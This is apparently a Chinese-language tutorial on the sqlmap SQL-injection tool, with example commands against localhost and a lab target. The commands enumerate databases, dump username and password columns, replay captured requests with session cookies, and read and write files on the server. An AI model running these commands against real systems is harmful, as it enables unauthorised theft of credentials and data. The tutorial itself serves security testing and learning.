本文共 2321 字,大约阅读时间需要 7 分钟。
sqlmap是安全测试工具,通常用于对已知的http接口进行sql注入测试,一旦注入成功,可以获取到后台包括数据库表、用户信息、数据内容等多种敏感信息,对web漏洞防范有重要意义。
--is-dba 当前用户权限(是否为root权限,mssql下最高权限为sa)--dbs 所有数据库--current-db 网站当前数据库--users 所有数据库用户--current-user 当前数据库用户--random-agent 构造随机user-agent--passwords 数据库密码--proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理--time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒--threads= 使用多少线程
注入点探测:
python sqlmap.py -u [url] 比如查看有哪些数据库:python sqlmap.py –u http://localhost:8080/login --data=’username=zhangsan&password=12345’ --dbs
查看当前数据库:
python sqlmap.py –u http://localhost:8080/login --data=’username=zhangsan&password=12345’ --current-db
查看当前用户:
python sqlmap.py –u http://localhost:8080/login --data=’username=zhangsan&password=12345’ --current-user
查看数据库中有哪些表:
python sqlmap.py –u http://localhost:8080/login --data=’username=zhangsan&password=12345’ -D dbname --table
查看表中有哪些字段:
python sqlmap.py –u http://localhost:8080/login --data=’username=zhangsan&password=12345’ -D dbname -T users --column
查看字段内容:
python sqlmap.py –u http://localhost:8080/login --data=’username=zhangsan&password=12345’ -D dbname -T users -C “username,password,usertype” --dump
先利用bp去抓一个包,直接发送包里面的内容保存到一个文件里面,然后用-r参数去实现它就好
例如 sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username参数,-dbms指定了某种数据库,这句话指定的是mysql数据库,-p指定的是参数,不指定的话每一个参数他都会尝试 注意这句话已经不像平常那样需要-u参数了,直接-r参数即可,因为报文里面已经含有了含有应有的各种条件 利用sqlmap进行需要登陆的注入可以跟上面进行post注入的一样,直接-r参数带上你的抓包文件路径,既然是需要登录的注入,那么报文里面肯定是要有cookie的
例如:
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1& Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” --current-db
输入:
sqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” --file-write C:\1.txt --file-dest /opt/lampp/htdocs/vulnerabilities/exec/1.txtsqlmap.py -u “http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low” --file-read=文件的绝对路径
sqlmap.py -u “url” --batch -v 3 --tamper “unmagicquotes.py” --dbs
–tamper 指定脚本文件,可在sqlmap安装目录查看支持的脚本,或者自定义修改,结合–batch -v 3使用时效果最佳 参考文章 : https://blog.csdn.net/zjc/article/details/90260373 https://www.toobug.cn/post/256.html https://blog.csdn.net/u011377996/article/details/81368482